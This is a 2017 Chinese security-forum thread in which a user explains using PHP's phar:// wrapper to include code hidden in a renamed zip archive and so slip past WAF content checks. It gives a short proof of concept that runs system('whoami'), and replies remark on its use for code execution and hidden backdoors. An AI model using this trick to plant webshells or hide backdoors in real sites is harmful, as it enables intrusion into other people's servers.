首页
论坛
专栏
课程

[分享]分享一个无意中发现的小技巧

2017-3-8 10:03 4047

[分享]分享一个无意中发现的小技巧

2017-3-8 10:03
4047

    可能有人已经早已经知道了,不过我也是一次在研究phar扩展的溢出漏洞时发现的一个技巧,就是利用phar:协议,这个协议可能在渗透过程中会帮你绕过一些东西。

我能够想到的是有些waf不会防php后缀的文件,但是他会检测里面的内容,我们可以通过包含的方式,包含rar后缀或者phar后缀里面的txt文件或者jpg文件达到绕过防护的目的,具体我也时间细细的把玩。你们可以自己想想,怎样利用才是最好的。

php代码内容:

<?php

include 'phar://test.rar/test.txt';

?>

txt里的内容:

<?php

echo system('whoami');

?>

之后将他压缩后,可以自己重命名为zip,phar,rar等格式。没关系,之后访问test.php文件后,会出现我们执行过后的代码。



[招聘]欢迎市场人员加入看雪学院团队!

最新回复 (15)
落入凡间的蓝 2017-3-8 23:37
2
0
感谢分享,这个可以当做代码执行在特定的条件很有用哦。
hackyzh 3 2017-3-9 08:42
3
0
落入凡间的蓝 感谢分享,这个可以当做代码执行在特定的条件很有用哦。
有用就行,学习路上就是需要别人的经验和技巧
netwind 13 2017-3-9 09:08
4
0
感谢分享!
蚯蚓降龙 2017-3-27 16:14
5
0
学习了
iawen 3 2017-3-27 21:08
6
0

确实,实测

happyxp 2017-3-28 10:43
7
0
隐蔽的后门,或者快捷的发布一些信息
cimoom 2017-3-29 22:40
8
0

可以的,之前想到过!貌似在哪里看过。

cimoom 2017-3-29 22:41
9
0

可以的,之前想到过!貌似在哪里看过。
niexinming 2017-3-29 22:44
10
0
http://blog.csdn.net/niexinming/article/details/52980140 2016 SWPU 考过
老锥 2017-4-7 17:57
11
0
phar协议只支持zip压缩,不支持rar的,就是说可以zip压缩后修改为任意后缀
hackyzh 3 2017-4-8 01:57
12
0
老锥 phar协议只支持zip压缩,不支持rar的,就是说可以zip压缩后修改为任意后缀
对的,我是改了后缀,不过没试过直接压缩rar
Ttstcy 2017-4-8 09:51
13
0
感谢分享。
KuPoint 2017-4-12 17:05
14
0
感谢分享。
jamesr 2017-4-13 08:16
15
0
感谢分享。 
kuchagege 2017-4-13 15:38
16
0
  有点老了  不是还是感谢
游客
登录 | 注册 方可回帖
返回